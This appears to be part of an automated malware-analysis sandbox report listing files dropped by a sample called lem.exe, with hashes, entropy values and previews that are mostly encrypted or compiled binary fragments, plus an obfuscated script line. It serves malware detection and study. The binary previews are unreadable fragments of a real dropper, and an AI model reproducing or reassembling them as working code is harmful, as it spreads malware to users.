Preview:	Set Financing=I..ptNBull-Architectural-Languages-Bring-Cool-Reliance-..iCXIon-Investigator-..owXhDisciplinary-Faq-Eyed-..ehLeads-Belgium-Subject-..CfValentine-Threatened-Restoration-..SmKinase-Procurement-Cube-Told-..Set Pink=t..qmiEquipped-Verizon-Increases-Newer-Eg-Compromise-Plenty-Intel-..EELNike-Affected-..zjPharmaceuticals-Ja-..hsMovers-Televisions-..AmDDelivery-Awareness-Complaint-Preserve-Honors-Discussed-Miracle-Gabriel-..FJCombination-..Set Answering=H..vupEqually-Islands-..usAbilities-Updated-Rarely-Denial-Bidding-Dirt-Checked-..XoOFiscal-Optimal-Vast-Further-Affected-Wants-..RRThong-Edge-..HAUWhen-Synopsis-Becoming-..VqBuried-Kathy-Milan-Apollo-Sheer-..ghUSaudi-Mileage-Detection-Unity-Infinite-Eric-Usa-Lenses-..Set Launched=5..JMdMedieval-Mind-Foul-Infection-Baths-Efforts-..IwRComplicated-Metals-Preserve-Forever-Genes-Demonstrates-Ltd-Delhi-Envelope-..nVuEBritannica-Ff-Federation-Lakes-Romance-Porsche-Subsection-Balanced-..eVsQDefinitely-Letters-Assure-Avenue-Zdnet-Agents-S

C:\Users\user\AppData\Local\Temp\Colonial

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	6.825606182838265
Encrypted:	false
SSDEEP:	1536:YYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOEg:fWy4ZNoGmROL7F1G7ho2kOF
MD5:	02B5952F3F0B3EF33C6AD0EE50BA13D3
SHA1:	0F7F1A5C9AD674098B380962EDDFB8E2499C28CF
SHA-256:	E17E9751D3E04A043DE086B4B26AE59A1DCF8B6C838FCC42B0CD2B47B807774C
SHA-512:	1226748B8810BCE5665C43A0E8CF3F6585ED2A2A9B4DC93B9FE1BB301898CFA120C0FBDF96CA8B5E3C31960521836E87A7326F2AA4A374666D5A3B53277A048F
Malicious:	false
Preview:	n.t.s. .a.r.e. .n.o.t. .a.l.l.o.w.e.d...".V.a.r.i.a.b.l.e. .m.u.s.t. .b.e. .o.f. .t.y.p.e. .".O.b.j.e.c.t."...1.T.h.e. .r.e.q.u.e.s.t.e.d. .a.c.t.i.o.n. .w.i.t.h. .t.h.i.s. .o.b.j.e.c.t. .h.a.s. .f.a.i.l.e.d...8.V.a.r.i.a.b.l.e. .a.p.p.e.a.r.s. .m.o.r.e. .t.h.a.n. .o.n.c.e. .i.n. .f.u.n.c.t.i.o.n. .d.e.c.l.a.r.a.t.i.o.n...2.R.e.D.i.m. .a.r.r.a.y. .c.a.n. .n.o.t. .b.e. .i.n.i.t.i.a.l.i.z.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r...1.A.n. .a.r.r.a.y. .v.a.r.i.a.b.l.e. .c.a.n. .n.o.t. .b.e. .u.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....C.a.n. .n.o.t. .r.e.d.e.c.l.a.r.e. .a. .c.o.n.s.t.a.n.t...5.C.a.n. .n.o.t. .r.e.d.e.c.l.a.r.e. .a. .p.a.r.a.m.e.t.e.r. .i.n.s.i.d.e. .a. .u.s.e.r. .f.u.n.c.t.i.o.n.........I.n.v.a.l.i.d. .f.i.l.e. .f.i.l.t.e.r. .g.i.v.e.n...*.E.x.p.e.c.t.e.d. .a. .v.a.r.i.a.b.l.e. .i.n. .u.s.e.r. .f.u.n.c.t.i.o.n. .c.a.l.l...1.".D.o.". .s.t.a.t.e.m.e.n.t. .h.a.s. .n.o. .m.a.t.c.h.i.n.g. .".U.n.t.i.l.". .s.t.a.t.e.m.e.n.t...2.".U.n.t.i.l.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.

C:\Users\user\AppData\Local\Temp\Contractor

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	7.996798534009921
Encrypted:	true
SSDEEP:	1536:OmBqjLBskqmgCub7WmH9DT1enI0Va/FJ2GkX5DMamIWSxEz:OmojLeN37ZH9f1eDAdo4tSK
MD5:	3D3482F49381B6FD0830558DEC464625
SHA1:	705C9181F55B2F4276D3689F8BED0EC25489877E
SHA-256:	476B64C0A243B52CB8B4BEBA0634E77CD176FD1D15C8D8E08DB41B67585E7C1C
SHA-512:	5777023FD4AF5D1A1DCF784E477D29B2B445BB73572D3D31208C4E5986A015FFA1D09AB65A709775723772FFF705F25F983BA228A72062F49D82964D18F9002B
Malicious:	false
Preview:	..\.]...;p.A.,...l.4.I..96....."2q[e.p..ML.D..0.E.!.G.....1....-t+.~....8...E. w.....\.......q.R..+];D....#q..../m....[i..9....@..../..f.G.@.{.j..E./.n.B...n.&......%'Op....E#......$.bu&a.D....&&.17j.'}..ZG.~.@)...T.".......Z..._.j.cK...v[s.~...`!D)...x.,_..-..K:$LQ.e.A.....V.,2-%.V.H}I.?....?.....#..p.\%..TT...B.a..x.iM....{.....&8 .B.......s~...y\..:...?_......#/......,.Y.a.....$...3.4.X..I....(..3..B/wn.X.]..`bvD..4.l......S...1.,_.........:]n...?...PQL.X.NU.m.....u.V.D.".,....N.........'.N.R.....K..B.d......A.u..:2.d.....7.....w9....HN../&.#`.}.D.....;d.M..r'........%Z..-..[....Q..#.q.M...GS4`.4.......h.Z.....zl.$......_....P.........e.QdJD....\|N..(.........ZbC./.L.Z.as8.A16.........*.....C`...6...^V.z!.a(s.BBa."... .;..x_.n.i.P...B.=...b.`....lU].;...HGkHvQ....H.k.zX.7.).7.K.ev.{..2..W..ob.]7...K...L..fc.%..a..s.;.U...9n'.o 4.R.=..N}..=\|..gZ.4....::......3.....sf.$q..^k.2.N+..z........n...U...c.\vn.vrf...e..Yu><...zwk....=v.@D_~P.kC...e.V"3

C:\Users\user\AppData\Local\Temp\Dick

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	134144
Entropy (8bit):	6.674977789477399
Encrypted:	false
SSDEEP:	3072:1BRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESA:DNPj0nEo3tb2j6AUkB0CThp6A
MD5:	8FEC4166BA86F7AC86DA9F06ABE49557
SHA1:	5927648717AD20DBC2B9C1EB30CB5CF990182128
SHA-256:	446CF37FD6B4C78C054185EC6D54823A0FDD3282FCA99B958B29E23CB4B075A0
SHA-512:	A9812F1D24434ECABFC9F9781C29BED83B56619E544A21F018C454565A0EBA447B0B66B3F78ABE42BF227CC1F0E6959576328EA9F6A2776771CE7E5CD2F1E7C4
Malicious:	false
Preview:	....."...U(.E.Bx.M.C...;Z0\|....U(.E.9G.u.E...A........U(.u..B0;.\|x.](.K8;.\|@.<.k..P......Y....d"..kC8.P.s(V.Vh......{8.~..s(.p...Y.C0.s(.{8.U.k...C(...kK0..C(.U..T..kK0..C(.U.T...C0.u..M(j.X...u...-..j._......U.......}..-...E..j.X....M.....&..3...E...+.......#...]..E.SP.N..U..'.....3.YY.u.9...."...E..M...+..............](..f;.w0.{...j.[......U..8t.........f;.h...v..](.....j#Xf;.......j.X....>f..t........K...t';.sM.u.......WQ...........t4...4V.q............+.;.w.f;.....u.;U.t.f.F.f;.....t.j.Y..}..t.f.......f#.....f;.u.....>f....t...........3.u...+..f9V....+..f9F....+......u....f....S......j)Xf;.t..r..u........f..u.f9...,...j?Z.....E.E...............j.^VR.B.P......U.F}.}........},..}.f..jxXf.r.f.B.f.r..t.......u?.E(j.Y.P .@...;.r.E(.M...r.j.+H.X....;.u..F.f.B..u..U..r...U.u..g..jnXf;.......joXf;.......jpXf;.......jqXf;.........r......jsXf;.........t......j..A.[f;........E.+..E...3....E.E......].f;.u....f9B...........f;.M.s.........E...x....~..E.E....E.....

C:\Users\user\AppData\Local\Temp\Fever

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	6.686304303605537
Encrypted:	false
SSDEEP:	1536:8Y464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cy:t4qv+32eOyKODOSpQSAU4Cy
MD5:	83828D024D7CAA17F6E52969E845D8E0
SHA1:	FB7538D9D4B604B128828B4CAD2F53CD2195D9C1
SHA-256:	BE0CCB43F0E2AA9090CECE1093DC56131AD5CC655D5CA35A53306CEFCEF56F8E
SHA-512:	41C95DD45EBB805A45CFEB197CACC830F9AC895FB966AC94CC688A206747E9BA3149A7698B1194CD4AD9B7C30CA571FEA115F22D8DF844472BA7E6D1D14782D7
Malicious:	false
Preview:	[]..U..E...........$...B..u..u..c...YY]..u..u..w.....E..u........P....YY3.].E..u........P.+.....E..u........P.U.....E..u........P.......u........u.j..<...YY3.@].E..u........P."...YYj.X].E..u........P....YYj.....B..B...B...B.+.B.@.B.U.B._.B.p.B...B...V..F......P....F.3.f...F...^.......y..t....j.h....h."J.hx"J.h."J..S....y..u....j.h....h."J.h."J.hL#J........U..M..y..t.....P.u......YY].....3.8M...............]..U...$SV.u.3.W.}.;.w....w....].t..H..........].H.u.... .E.3.@....E....3.J......+.M.+.U.8E..M....H%........E.;.~..u..u..B...YYj.X....3.8E....H%.......;...5....E.H...M.....E.M...........E...@.......H.3.3.@.u...M..E....E......U.E.3.3.@.u..#..E..#...u..]..E.M.#.#.....u...M.8].t..E..U.#.#....t....E...u...t5.i.....t.=....t.=....u..]...8]......8].t.8].u.8].t....M....."u.................t).M...!..;...]...w.;...S....].+].+].K.G....u..u......YYj......M................U..@r..........3..J.@3..t...M.E....E.....U..E.3.3.@.bt..#..E..#...u..]..

C:\Users\user\AppData\Local\Temp\Intro

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	5.541206148230026
Encrypted:	false
SSDEEP:	768:5KPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/S+:58QuklMBNIimuzaAwusPL
MD5:	6689078E7ECA2AE3429263C902005A36
SHA1:	13348F7B86189E5BE3C1CF577235159B797C09BE
SHA-256:	FFDBABA35048B7F354D030F47A9431FA5C752E469B87276075260904A07E08E4
SHA-512:	E18BB61E6858598DF3A132B624A413F9427132222175EDA6E91E1D95479852AFB656D68F15D6321BD08E2910120DD45BB38655CA9AAA748150A4DEA16FB818D9
Malicious:	false
Preview:	.?.......?.......?.......?.....R.?.....R.?.....$.?.....$.?.......?.......?.......?.......?.......?.......?.....t.?.....t.?.....J.?.....J.?..... .?..... .?.......?.......?.......?.......?.......?.......?.......?.......?.....\.?.....\.?.....6.?.....6.?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.....b.?.....b.?.....B.?.....B.?..... .?..... .?.......?.......?..................<....?.N~.'..<..x..z.?...'.$=...#.f.?.$./...=.@..0..?@A.S..1=..c..E.?.Pa..B==.`..R.?Dj0Q:W$=...>m..?...Lyc>=..p.%.?...?C;0=...\|...?.Ix.".<=.``...?...y.M==..or.O.?..+C..==...v...?.....R1=.PQ....?....b.=.@...P.?.5M[g.?=...V...?d+...[7=.......?n...B.>=. kz.*.?...w.#8=.0.n..?C.#...7=..{....?D.i.00=....f.?.j....-=.x...).?...}z..=. ....?.....0$=.H.V...?....o..=.X...a.?..;.M_8=.@.....?......5=......?.^...@'=..L$...?.../r(=.....<.?.vT.. 3=...?...?..Cg..?=.0....?W/..f.1=.`.(.J.?Dk....0=.h..#..?.@.. .6=......?..._...=...\|.D.?.&.?4j<=..'....?Q...n.&=......?.l.....=....6.?..DX.,

C:\Users\user\AppData\Local\Temp\Jamie

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	6.310961115368738
Encrypted:	false
SSDEEP:	3072:zg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UT:85vPeDkjGgQaE/loUT
MD5:	0FEF43A1D2F278AD03BB846A85EB2504
SHA1:	1432D6AA98F4C9C45127DB74B5C02365B0B1569A
SHA-256:	5EA9933E7E3138736B9492660E6A83696401F8E6F8041C85B1ECD28D307D5790
SHA-512:	AB2C3BB2BD452FCA44120D6F3914D1E436F1EE85129251CD8CA9F4B4BBE7805E5508905B74D9702E402A0C05285A7E104CD00FFA476C4B7B67B17B4070A55C20
Malicious:	false
Preview:	......8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.\|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....\|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$.

C:\Users\user\AppData\Local\Temp\Legislative

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	71389
Entropy (8bit):	7.997603584249478
Encrypted:	true
SSDEEP:	1536:MT2ZVYAoeVFwNjlHzGOVEEHHK/95xfgDpkCijTCGXRz21cvGBY3exC:O2ZVNVFUlHVNHHK/DCzOCGhy1o+9xC
MD5:	205B1F531DC790C74D39A1B682C44A3C
SHA1:	BC5DC0B570F685910CE9122781C30BE7438DAB57
SHA-256:	CBC6F6197C066A563511E6B51F02072FF21ECC3FE41C6DE48CA050C22E0B7B43
SHA-512:	F03FE4176022C356A20AB210813A14D3AE4B8FE59E04AE2708DF6CE4CE28A5C5BA873D936578A13FF339506C7619975B70263451334D16D6F75895188B98AC3A
Malicious:	false
Preview:	...,.%..Z..Go..4W._.?.F...s..Q\.l^Y...>..b.j.W...7.....w..r<m.2.IV.....W........D.......z.AV.R...0.F-R.....9...<..mo.`..\|...}s.I..W...V.e55IR\|..Gx.Q.]Cb...]..).IZ....t.]W....]BM..C.s... .Y.<.v.b...z..c....Y.2^j.......Fe.....v...Yo....n.......m.....DlU..A.]./...di.L.RK.i.<....=.8.x1...i:.D^>9..j.#V.]u.......ty....U..I.0..>...-....{-M2..AR&.8a..!1.....c-...[.P.OkL8..'...y+Z...n..6o.:%......\|v..Ou.3\|..i.x.......5.qO...X..O..D....@..f..%?7U.)..Z..+.C..n*%d<.\|...r..{.tY..)....}R...Q...D...4Py......j.......gp....9&....W.....P.w..!....=#..1.....~.<.H-...?.5..B..d$.rmwQ.......(....Dj...y.G....mp.^..J-.P.J...9C.c.......AY.8.I.....Z.....X.5.-.%.r+F.4.xpA.n..A..o ...w;.9]..f.H...R.YF..`.....Q..P .@...O..2[r...."..-...-.^..Xw..7o.O.3..8...k..7P..=lO.0.o..M'..sDy@...2}.....?...9J..\.w...4.'8fd....6;".h...(..-jc.......~.F_...rhc...p.IE}c.).....Q..G-...:z....!.l..R....1.;u....uQ......XY-o....."......c.....0.M..l.7#..z.H.M...=...p2....7..aQ6G.

C:\Users\user\AppData\Local\Temp\Participating

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	7.9977360681233565
Encrypted:	true
SSDEEP:	1536:8KnGbkPNpXFQd4tW9wbuBk5WNJMOcRc+ykpNA9NhJH5Riz4pGLkKtVdEq+loayoX:FJQd4tywoXMVa+9cvhZ5o0plm7+lSijv
MD5:	6B669AEEDE2444CAACAE56D6634856B4
SHA1:	D2F5E1223534F3458B2C537D7F352A7F66ED2E8A
SHA-256:	1D28DBEB808CE4112B273F21EF6F4625F3AD0C99ADC0D5B5FC3BD6CB28D2EA88
SHA-512:	D5D172E91B02B829E8C4BB754C843A69C4B6A34764617505B8C8114F5AE788973673879C017DE1D98D7E47D714DD2BBB512D7BD574349FA2B690384FDB99DEB6
Malicious:	false
Preview:	...NsRcjh...)H...=.q=+."..q.H..}...=/...=_X?...9U..]Q.d.,.h...G3..X.U.>'...>..#be... ..D.x....$8.@.[.w.5d..H.E.f,8f....R..>4.......-.g...QYQ..Q......./...b.]9.8.......V....\X.Z.FD.5.7....L.v..@.Uv....;..L..DE........d..&{[go.:...b....z........V..V.N..B...:.^.\|mBdqj..nn$y.......w=U.P.r...ZA.1.5. u.Y...).7t.....MR?.....}2....LM...,.zUA..]......?.B.........F..(..Q.\.....\....?t).../..p6.?BD...A.A.\..XF....[5.......?%.'...O.">..........V:.zj.'.....6...E`W..W..O.7m....7.?.?.k..c....6...`c".....J....K.1o.!in.Rt0..ekl.....,.(Q!u.v.JX..a.x.......18...........L.N.!o......T........B...2.r..$.}... ^..s...=.)..2.K...Q3`.....R....T:oN.R.<2:`._.....\|}.^M.o...I. .8...W.Z....C...i...YU...*..>.:?.'.`....#.@T.,B....V....,.`.5..G_.W....6........4D..Dk..?T..@.....y..-n..[.)$.D.X..y......G2.sF.....Om......t.!..j[...A.^.>.;...6'5P?..A....0.D%%"%.....;..d!.Q..SMm......z.$.......(.AD...]....D[=..TQ,..j.g.#.K`..6...(..."=6sr.<..ak.m.W..e]`.m.w....}.H..g.].m.f.J...H

C:\Users\user\AppData\Local\Temp\Penalties

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	2253
Entropy (8bit):	5.210185147584243
Encrypted:	false
SSDEEP:	48:B9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLV9:rSEA5O5W+MfH5S1CqlV9
MD5:	6FF1E4F807047A9554FED9CF5520B527
SHA1:	B318525BEA237308E47AC9E54A6AAA86C1C0BAF9
SHA-256:	4511CEBD102C965725C9E68CFE398EA6169BD0C0971FC7C083A32A45E1D31AC6
SHA-512:	95F63CDC70E27C1C69DFC324FCDD275C8124EE67C379D3F358C1EC28AB98DE4D77CE37B89CD2A8BFE3D39867B67AC3692C35AE668C10E384A528DAEEBCBFD077
Malicious:	false
Preview:	Cleared........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Produced

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.996648286668622
Encrypted:	true
SSDEEP:	1536:cBX1dlaX3yjVMLx08/X5KK8FqluzBxXS+fX:+DAX3yCLxZpNeBNrX
MD5:	CC60353BD3E192565DABB8EE57E563EC
SHA1:	08CD358077018723C047DEA1235D04325C24D655
SHA-256:	1EF7F2E0744B21850649B7BE1231AE3DB5548BAAE3E724B2058513B6AEBCA23A
SHA-512:	F13E0CB0C19E6F61B9D4747E57D60614B91D47B8DFE73E5739BC8BF2F180D2E21D801CC8FD4A1E4F3431F0303F1B2350B80450B1CFEC67C0683470D743D17BE4
Malicious:	false
Preview:	.............6=..[.g.....p.v.t...c.....&.H[...&.g.....?e$.9.y....>X...8...)B..e...5....(...2d.+[.[...V......V.~Q.kkA.t.r.U].d.k.A..}..r.Je...EoOz.........g...x...{.v.~.a...b.....N.....IP.GN........AWP...@5..]...2.........8\y...pi....~........i.....'m...K...M./}1..[..;}..g... x./jI..6.e.... .w......i .\.OR w...v..1.1f.j...p.;..P\B.9...4.}V.W=.0....g...I.&~..T.I..Kd.+..z.5.eBS.>n.52j.Z....V+...!.p....^%........7U...^2.....Z.9...'..p.9..u.h.]x.6g/.h.....7.dQ.u.}.....Hu.>.oG..........@.;..x....\.S{)sH5Lb..I_&.......y6^...?x..k.l......@...J.U.{].!.o.../ ....E.u.a..B...\|].d&mB.s.[....a0;.?...@...._...r...1.4.k.{..q..V..Z.]:....S[.ED.....<X.1.M.......q.O.r......' .EwzM`.R'C....HsV.\....2..b.i.dDK..s)G.r..n..O..O........&.#....)...,.$.+....VBd+........w).. 3C.\j..:.6{.G0.tb.......B..'Cr...*...2..u.t.......W.......u.;.b...-k....n.w$.R.Sy.A^S.][a4.?....#{j"..G.....G8X.>.:h..Q.\|...n.r.I...(..2?..]]}..]......e$"#.!..).K.>..4.X.j

C:\Users\user\AppData\Local\Temp\Raising

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	7.373547942480216
Encrypted:	false
SSDEEP:	24:apAiuDh3JBqjx24pKGKQ6kJBljrn5w7UYkmfOjDb138Px:aBwPuKGPakfDb13g
MD5:	A60A51A234B633C4C402189FF0FD558E
SHA1:	501C84ED7488AB1E4BC90EB9356740B6AA0E3D4C
SHA-256:	392DCA52A41ED530E2AE4D2FCB2E44936AC5F7E7557378E4B60D9A3A99A239F4
SHA-512:	50423E9325BC43FCF47F3C57222F95F08E1B73738D9067B2CD91AE6638D8AFAEB756D17F83FC13003111F82B290323DF4DBBA2D6AC75F2FEFAFFF8081834F55A
Malicious:	false
Preview:	Q.#...2k.....,3.:;%.@.;,.x.a/....Uo....M.(.r..bPe...1...GX?_1..I0..E...0o0[1.0...U....BE1.0...U....GlobalSign nv-sa110/..U...(GlobalSign Timestamping CA - SHA384 - G4....FiP....p...MA.0...`.H.e.......-0....H......1....H........0+...H.....41.0.0...`.H.e.........H........0/...H......1". .+...9+e..X.t...pa.R.V.q.G.M%J.0.....H......./1..0..0..0... .... .mN'Tr.h.x.edg....e.......0s0_.]0[1.0...U....BE1.0...U....GlobalSign nv-sa110/..U...(GlobalSign Timestamping CA - SHA384 - G4....FiP....p...MA.0....H............>e}.l.jdX^...0...=..........X.@\....T.T...(....s.6.J.be....8Lf....k.Y...&.........=.80.X.k..!o.'.w.....qJ.....\|....R...x.jS.C.^...ykRm...NVR...Yp..SQ..f......cA$..B..Kw......o.U3k......-\|.....u.P.nD#......U.CS.].....h.A..........7..hS c..Q.r...B.@..i.U.[ko:E>....).S.....?.<R.....m..^,i...T....._.i......Q...u.....O.T.?=..$....+...o.{.PN..D..N...cp.A....P../.T.......

C:\Users\user\AppData\Local\Temp\Sky

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	Windows Precompiled iNF, version 2.1, flags 0x2010001, unicoded, at 0x10102 "", at 0x7070709 WinDirPath, LanguageID 909, at 0x9090909 language
Category:	dropped
Size (bytes):	52224
Entropy (8bit):	6.685645875413775
Encrypted:	false
SSDEEP:	1536:wpkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TK:fQWf05mjccBiqXvpgf
MD5:	7286492DA76FE467D675F4BC75A3B359
SHA1:	410424D584323DF3FB8889BEED88E4165F523AAB
SHA-256:	6A0534C1A06FC535E7D78FCECBA6519600D39FF0BCCC8D69010630C4484785E5
SHA-512:	A23A7A9E4DA1CC30B0318267D1330C8B1C831D33889027107BAA6CEC9D3D13AE43D83A330BBFDE1DC8EB8D7998365746650EA476620B06620DE255A7738D8AB2
Malicious:	false
Preview:	......................................................................................................................U..QS..U.VW.}.......3.....1L...C...............f;.......Bf;............f;.......Bf;............f;...:...Bf;...0........f;..."...Bf;.........}tj.....f;..........f;.tJ.....f;.t@..U........V........^......3.Bf;.........................3._^[..E.@P.....u...........r....v...v........}..........t......U...<SV.....W..]....f...M.f;.......j.Zjp.E.!....E.a...X.E......E.....f;}.......f..n..i...f..o.._...f;...V......;.........G.....]........[........t<..T..F.......1L..4F..t..A..7v"........j.Zf...M.jpf;.X..v..._^[..f.F......f#......f;.u......f;}...V.......j!Yf+.f..f..(.......E..P.E....p..E...YYj!Yf;.......f..#......f..%......f..'......3.M..E.......t .M...QP.M.Q.u....`..................E.f.}.jpX.......-......%...H.........H.........H..............f;.tVj"_...7.]..C.f;...r....]...Z........F.f;E.t.f;E................`v.jaX;.........F.....~....U...0...U.U.SV........3.

C:\Users\user\AppData\Local\Temp\Surgical

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	119808
Entropy (8bit):	6.643983910910844
Encrypted:	false
SSDEEP:	3072:70Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHk:ObfSCOMVIPPL/sZ7HS3z4
MD5:	73842ED2C144AB22A0301F7BF71250EB
SHA1:	7848E86E6E92E040FB635377A4BB813E6877EC10
SHA-256:	B63DDC5DD8120693477CB2BE869E65C077A92FD27B6B44815FA702C8A07F5F80
SHA-512:	50A43C9577319BF43031DB61336DBE4731958AC24F2C878271E6108A85653C205E6D0B067450E17528FD6239747B2C0DD1243E2B553AD417CA3C032BE52AF2D8
Malicious:	false
Preview:	.W.......u....9.u.[j..WX..Y..^_..]..(W..3.PPPPP.qV....U..SVW.=..M....?.t*.].S.6.u..P>.......u......<=t...t.....>.u.+......_..^[].+.......U..]......t.I.....#M.....%.#M......U..Q...L.3.E.W.}.;}.u....WV..S....t.......I....t....;u.u.;u.u....,;.t&....~..t.....t.j.......I...Y....F.;.u.2.[^.M.3._..8....]..U..Q...L.3.E.V.u.9u.t#...W.>..t.j.......I...Y....F.;E.u._.M...3.^.7....].j.h.L..N7...e...E..0.q\..Y.e...5..L.....35.#M...u..E.............X7......u.M..1.{\..Y..U.....E..M..E..E.E.P.u..E.P......]..U..E.H...t-...t....t....t....t.3.]..#M.]..#M.]..#M.]..#M.]..U..k.x'J...E...;.t..U.9P.t....;.u.3.]..U..Q.E.Pj..]...YY..]..U...u...#M..}z...u...#M..pz...u...#M..cz...u...#M..Vz..]..^Y......j,h.L...H..3.].!]...M.u.j._;...t5.F....t"H...t'H...uL.....t....t....~;....6V.........E..Y....]..u.........3V.....YY3.......u..2..........:S......2.M.E.e....t.j..Z..Y.M.e...E...e...E..t.....L.....3...M.......E.3......U.U..........u...t.j..Z..Yj...x..;.t....t....u#.C.

C:\Users\user\AppData\Local\Temp\Tvs

Download File

Process:	C:\Users\user\Desktop\lem.exe
File Type:	data
Category:	dropped
Size (bytes):	82944
Entropy (8bit):	7.997399353180572
Encrypted:	true
SSDEEP:	1536:uy7xUhDP49yfwHwrMKzD0X8jRDq7qMpnYzDYGeawL72v7aEtI:576mwrRkX8tu7pYhLwLyv7pe
MD5:	09616A6313080EC4B3845CF427AF1DC3
SHA1:	86801BDA1D8CB25068D8841571E1A309930CEB7B
SHA-256:	76483C788B2C26A70DCBDA07395412BCB0A83184B5D9806344FCFCD08DC847DE
SHA-512:	52DF199B57E222A3F8990139B414E7FD51D2C034A2CD00BBD23BDF3B3A25D745F3241744BFD394E066785D1FFD6F20BA4EA656B516903732EF304A518993ED2D
Malicious:	false
Preview:	^ .a....3..........4....p.Ver...".w....n...........h....H..ma+.P..)_.&../.r..-..)X..BK...@....?q....@0CD.q.1.........NY....El[.Wc.6E.@.C....T.V.8[....?V.......4.b..X'..'.M...\d....Vo.....t..to..t+....UX5.g...........n.Q{>&9....PsR.i.....Z. ,..T...^..=.....Yrm.......Nu.....8..rz..fq....`..?F...p...q..{#7pv....z.&4..._.Y..pa.}CZcU............~l2E8J.b.5J.b..s...n.oQGE.W.f{.b..4\.\~....].l.7...B.......W1g.....8;.....Na....,.F.zA.... ...-....1@..HG.v-hq...S.Tb.Y.......4a.XTK...j.f.......9Y5...Pt......4..&).~..P.^C...8.0.-..F.kP%.W:.T.".....{.<6....\|uL..yV.A.p..hc..}..B...x..hP.0...h..H...z..Y[.`.....'\|....i.........v..=.>.~H.'..'..+.jH^...zp....TcE..C.5.T.I..@...w../3..r...rr..`.xY..A.....Es.y..H.....`oC.....\|'U.0{.u..+..0...Po.`WF.t..9;.>.A.E...=.Hk......#7^P...A..u......61...5..T.S...}.6....U.U..H5...,..3.qW.n..,^..U7...B....z.>...s.....C..B....R.:.7.....\..J..>...m...P.......Dv......._2.....]0A.@_G....$.f.4?.....C...M.W............5.Ao.

Chrome Cache Entry: 92

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3452)
Category:	downloaded
Size (bytes):	3457
Entropy (8bit):	5.836139210851907
Encrypted:	false
SSDEEP:	96:TnliBSwIN6666VzXJxocccCqVMpprVoKQAd2kWO4gPrzQffffo:TlASBN6666VzZxocJTCKCd2kJv
MD5:	F4694B5765B44809057FB106DDDD76EC
SHA1:	1549126BBFBA774D598A974E183D1BCD02363C46
SHA-256:	927B6FF2D6546A796563E34E7E272ADE777BE6A19717FD649B242E4C10E61689
SHA-512:	B03CACFC6BB2344E7103C78A75A919A00012043CF5CC932FFB58B9740B5AAEF10E373245AF4F5967FBA0B1987B7EEFC3215B4EC562D6C7E7918333339F85A6B7
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
